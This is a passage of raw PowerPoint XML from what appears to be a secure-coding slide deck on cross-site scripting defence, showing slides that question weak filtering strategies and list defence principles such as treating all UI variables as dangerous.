        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="1792068"/>
            <a:ext cx="9144000" cy="4160519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157446254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XSS Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="62" name="Group 61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="625059" y="699501"/>
            <a:ext cx="7801464" cy="4076408"/>
            <a:chOff x="273395" y="483659"/>
            <a:chExt cx="8648657" cy="4519082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34" name="Group 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1193527" y="964750"/>
              <a:ext cx="6690803" cy="4030886"/>
              <a:chOff x="975987" y="1390937"/>
              <a:chExt cx="6690803" cy="4030886"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="TextBox 34"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2222429" y="1390937"/>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6" name="TextBox 35"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5726576" y="1390937"/>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7" name="TextBox 36"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4374304" y="1967091"/>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8" name="TextBox 37"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="975987" y="232103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9" name="TextBox 38"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7219953" y="232103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40" name="TextBox 39"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4835842" y="261499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41" name="TextBox 40"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2986757" y="261499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42" name="TextBox 41"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="975987" y="3499250"/>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3" name="TextBox 42"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3139620" y="3499250"/>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4" name="TextBox 43"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7114122" y="3652108"/>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5" name="TextBox 44"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6696682" y="4171862"/>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6" name="TextBox 45"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4150885" y="4359994"/>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7" name="TextBox 46"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3633493" y="4713937"/>
                <a:ext cx="446837" cy="707886"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="4000" b="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>O</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="48" name="Group 47"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="273395" y="483659"/>
              <a:ext cx="8648657" cy="4519082"/>
              <a:chOff x="49975" y="1126475"/>
              <a:chExt cx="8648657" cy="4519082"/>
            </a:xfrm>
            <a:noFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="Rectangle 48"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3762842" y="3652108"/>
                <a:ext cx="333939" cy="333939"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="20000"/>
                  </a:srgb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1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="Freeform 1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1252321" y="1126475"/>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Freeform 1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4821141" y="1126475"/>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Freeform 1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="49975" y="2143539"/>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Freeform 1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6293941" y="2143539"/>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Freeform 1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4303751" y="2719693"/>
                <a:ext cx="1552172" cy="82427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Freeform 1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2454666" y="2719693"/>
                <a:ext cx="1552172" cy="82427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Freeform 55"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3927466" y="2243509"/>
                <a:ext cx="364526" cy="1446265"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 364526"/>
                  <a:gd name="connsiteY0" fmla="*/ 1446265 h 1446265"/>
                  <a:gd name="connsiteX1" fmla="*/ 235178 w 364526"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 1446265"/>
                  <a:gd name="connsiteX2" fmla="*/ 364526 w 364526"/>
                  <a:gd name="connsiteY2" fmla="*/ 399781 h 1446265"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX0" y="connsiteY0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX1" y="connsiteY1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX2" y="connsiteY2"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="364526" h="1446265">
                    <a:moveTo>
                      <a:pt x="0" y="1446265"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="235178" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364526" y="399781"/>
                    </a:ln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5797128" y="2490432"/>
                <a:ext cx="1599208" cy="1399232"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1599208 w 1599208"/>
                  <a:gd name="connsiteY0" fmla="*/ 1399232 h 1399232"/>
                  <a:gd name="connsiteX1" fmla="*/ 0 w 1599208"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 1399232"/>
                  <a:gd name="connsiteX2" fmla="*/ 35277 w 1599208"/>
                  <a:gd name="connsiteY2" fmla="*/ 399781 h 1399232"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX0" y="connsiteY0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX1" y="connsiteY1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX2" y="connsiteY2"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1599208" h="1399232">
                    <a:moveTo>
                      <a:pt x="1599208" y="1399232"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35277" y="399781"/>
                    </a:ln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456616" y="4030763"/>
                <a:ext cx="1575690" cy="564396"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1575690 w 1575690"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 564396"/>
                  <a:gd name="connsiteX1" fmla="*/ 658497 w 1575690"/>
                  <a:gd name="connsiteY1" fmla="*/ 70550 h 564396"/>
                  <a:gd name="connsiteX2" fmla="*/ 258695 w 1575690"/>
                  <a:gd name="connsiteY2" fmla="*/ 235165 h 564396"/>
                  <a:gd name="connsiteX3" fmla="*/ 0 w 1575690"/>
                  <a:gd name="connsiteY3" fmla="*/ 564396 h 564396"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX0" y="connsiteY0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX1" y="connsiteY1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX2" y="connsiteY2"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX3" y="connsiteY3"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1575690" h="564396">
                    <a:moveTo>
                      <a:pt x="1575690" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1226843" y="15678"/>
                      <a:pt x="877996" y="31356"/>
                      <a:pt x="658497" y="70550"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="438998" y="109744"/>
                      <a:pt x="368444" y="152857"/>
                      <a:pt x="258695" y="235165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148945" y="317473"/>
                      <a:pt x="0" y="564396"/>
                      <a:pt x="0" y="564396"/>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1246442" y="2792065"/>
                <a:ext cx="3739324" cy="968258"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 3739324 w 3739324"/>
                  <a:gd name="connsiteY0" fmla="*/ 15840 h 968258"/>
                  <a:gd name="connsiteX1" fmla="*/ 2375294 w 3739324"/>
                  <a:gd name="connsiteY1" fmla="*/ 15840 h 968258"/>
                  <a:gd name="connsiteX2" fmla="*/ 1058299 w 3739324"/>
                  <a:gd name="connsiteY2" fmla="*/ 180455 h 968258"/>
                  <a:gd name="connsiteX3" fmla="*/ 399802 w 3739324"/>
                  <a:gd name="connsiteY3" fmla="*/ 580236 h 968258"/>
                  <a:gd name="connsiteX4" fmla="*/ 0 w 3739324"/>
                  <a:gd name="connsiteY4" fmla="*/ 968258 h 9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324" h="968258">
                    <a:moveTo>
                      <a:pt x="3739324" y="15840"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="3280727" y="2122"/>
                      <a:pt x="2822131" y="-11596"/>
                      <a:pt x="2375294" y="15840"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1928457" y="43276"/>
                      <a:pt x="1387548" y="86389"/>
                      <a:pt x="1058299" y="180455"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="729050" y="274521"/>
                      <a:pt x="576185" y="448935"/>
                      <a:pt x="399802" y="580236"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="223419" y="711537"/>
                      <a:pt x="0" y="968258"/>
                      <a:pt x="0" y="968258"/>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915707" y="5232422"/>
                <a:ext cx="1528655" cy="413135"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1528655 w 1528655"/>
                  <a:gd name="connsiteY0" fmla="*/ 223407 h 413135"/>
                  <a:gd name="connsiteX1" fmla="*/ 1246442 w 1528655"/>
                  <a:gd name="connsiteY1" fmla="*/ 352747 h 413135"/>
                  <a:gd name="connsiteX2" fmla="*/ 823122 w 1528655"/>
                  <a:gd name="connsiteY2" fmla="*/ 411539 h 413135"/>
                  <a:gd name="connsiteX3" fmla="*/ 411561 w 1528655"/>
                  <a:gd name="connsiteY3" fmla="*/ 293956 h 413135"/>
                  <a:gd name="connsiteX4" fmla="*/ 82313 w 1528655"/>
                  <a:gd name="connsiteY4" fmla="*/ 94066 h 413135"/>
                  <a:gd name="connsiteX5" fmla="*/ 0 w 1528655"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 41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655" h="413135">
                    <a:moveTo>
                      <a:pt x="1528655" y="223407"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1446343" y="272399"/>
                      <a:pt x="1364031" y="321392"/>
                      <a:pt x="1246442" y="352747"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1128853" y="384102"/>
                      <a:pt x="962269" y="421338"/>
                      <a:pt x="823122" y="411539"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="683975" y="401741"/>
                      <a:pt x="535029" y="346868"/>
                      <a:pt x="411561" y="293956"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="288093" y="241044"/>
                      <a:pt x="150906" y="143059"/>
                      <a:pt x="82313" y="94066"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13719" y="45073"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>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949499" y="1585047"/>
                <a:ext cx="1058299" cy="2845497"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1058299 w 1058299"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 2845497"/>
                  <a:gd name="connsiteX1" fmla="*/ 0 w 1058299"/>
                  <a:gd name="connsiteY1" fmla="*/ 952418 h 2845497"/>
                  <a:gd name="connsiteX2" fmla="*/ 11759 w 1058299"/>
                  <a:gd name="connsiteY2" fmla="*/ 2845497 h 2845497"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX0" y="connsiteY0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX1" y="connsiteY1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX2" y="connsiteY2"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1058299" h="2845497">
                    <a:moveTo>
                      <a:pt x="1058299" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="952418"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3920" y="1583444"/>
                      <a:pt x="7839" y="2214471"/>
                      <a:pt x="11759" y="2845497"/>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79082989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Danger:  XSS Weak Defense Used</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Getting rid of XSS is a difficult task!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How can we prevent XSS in our web application?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why won't these strategies work?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="2190009"/>
            <a:ext cx="8686800" cy="400110"/>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Remove all &lt;script&gt; tags?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="2692313"/>
            <a:ext cx="8686800" cy="400110"/>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Eliminate all special characters?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="3194617"/>
            <a:ext cx="8686800" cy="400110"/>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Detect and block evil JavaScript without blocking any good data?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="3696921"/>
            <a:ext cx="8686800" cy="400110"/>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Disallow user input? (not possible)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7221666" y="457200"/>
            <a:ext cx="1465134" cy="1463040"/>
            <a:chOff x="6835420" y="616218"/>
            <a:chExt cx="1465134" cy="1484240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="Group 12"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Oval 16"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="DB3D16"/>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19" name="TextBox 18"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7327992" y="616218"/>
              <a:ext cx="475132" cy="1477328"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="9600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="821315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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>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6" presetClass="emph" presetSubtype="0" repeatCount="2000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">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998"/>
            <a:ext cx="8229600" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS Defense Principles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1029692"/>
            <a:ext cx="7924800" cy="5316840"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Assume all variables added to a UI are dangerous</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" i="1">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>all variables and content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>dynamically added to a UI are protected from XSS in some way </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1">
                <a:solidFill>
